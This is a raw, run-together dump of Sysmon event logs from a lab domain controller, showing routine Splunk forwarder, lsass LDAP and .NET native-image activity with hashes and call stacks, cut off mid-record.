AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000022529Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.601{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local61457-true0:0:0:0:0:0:0:1win-dc-663.attackrange.local389ldap 354300x800000000000000022528Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.601{4DB9351A-9DEA-60D3-2B00-00000000CF01}3024C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local61457-true0:0:0:0:0:0:0:1win-dc-663.attackrange.local389ldap 23542300x800000000000000022527Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:54.311{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F282E4CEC8376305112DDCBF37297E6,SHA256=84FC3EB154C2D408F904C57AAF49D791AA555695AAC35A211DD77D36492D083C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022526Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:54.077{4DB9351A-A26D-60D3-2305-00000000CF01}69006584C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022557Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.905{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26F-60D3-2705-00000000CF01}5968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022556Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.828{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A26F-60D3-2705-00000000CF01}5968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022555Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.828{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26F-60D3-2705-00000000CF01}5968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022554Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.812{4DB9351A-A26F-60D3-2505-00000000CF01}6276NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\2D6CP7MK75\PresentationCore.ni.dll.auxMD5=24C00B8C59A321950F99D1D227F78044,SHA256=BBF5F7F5F68421D8B48F3C97A9C6E576372C1742AD21A8CF98B45ED0ACA72540,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022553Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.812{4DB9351A-A26F-60D3-2505-00000000CF01}6276NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\2D6CP7MK75\PresentationCore.ni.dllMD5=28921CC9C254333B9D89911A36B465D5,SHA256=75E5FC21A430CC4971E2D7B354B82A7C21D102725CEF6315B42CB1B57A9F1776,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022552Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.655{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A26F-60D3-2605-00000000CF01}6384C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022551Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.640{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022550Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.640{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022549Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.640{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022548Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.640{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022547Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.640{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A26F-60D3-2605-00000000CF01}6384C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022546Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.640{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A26F-60D3-2605-00000000CF01}6384C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000022545Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.515{4DB9351A-A26F-60D3-2605-00000000CF01}6384C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000022544Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.561{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F2DB6B1A5106EFF36D20C3E20BB0509D,SHA256=88C2CE1E2552301D8A778DC0D7B8A8D1F88894070E97580EA732EF99963821D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022543Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.311{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57D3BD5D0C9C7E61D82185F75D6E37E6,SHA256=1612A7E7D440F5AF0FA2E167521D96B86015E8472923CD12DC759C4AE05786D5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022542Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.155{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26F-60D3-2505-00000000CF01}6276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022541Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.124{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A26F-60D3-2505-00000000CF01}6276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022540Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.124{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26F-60D3-2505-00000000CF01}6276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022539Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.124{4DB9351A-A26D-60D3-2205-00000000CF01}7024NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\QSG450UOWZ\System.ServiceModel.ni.dll.auxMD5=E7FB67E6360A9EAFB000DFB95B9806D7,SHA256=AA33F00E00CFB07A19DAE9A74A25A947B55059E00154AC216CEE0BEE78E02213,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022538Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.124{4DB9351A-A26D-60D3-2205-00000000CF01}7024NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\QSG450UOWZ\System.ServiceModel.ni.dllMD5=9A2FBDD6642DEB5501CE7C0D4DD73941,SHA256=C503088E75F96625BB4CB249D80B28E09184F7E47A289E8D60772855EED85D6B,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022573Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:56.921{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A270-60D3-2905-00000000CF01}5756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022572Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:56.921{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022571Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:56.921{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022570Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:56.921{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022569Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:56.921{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022568Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:56.921{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A270-60D3-2905-00000000CF01}5756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022567Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:56.921{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A270-60D3-2905-00000000CF01}5756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 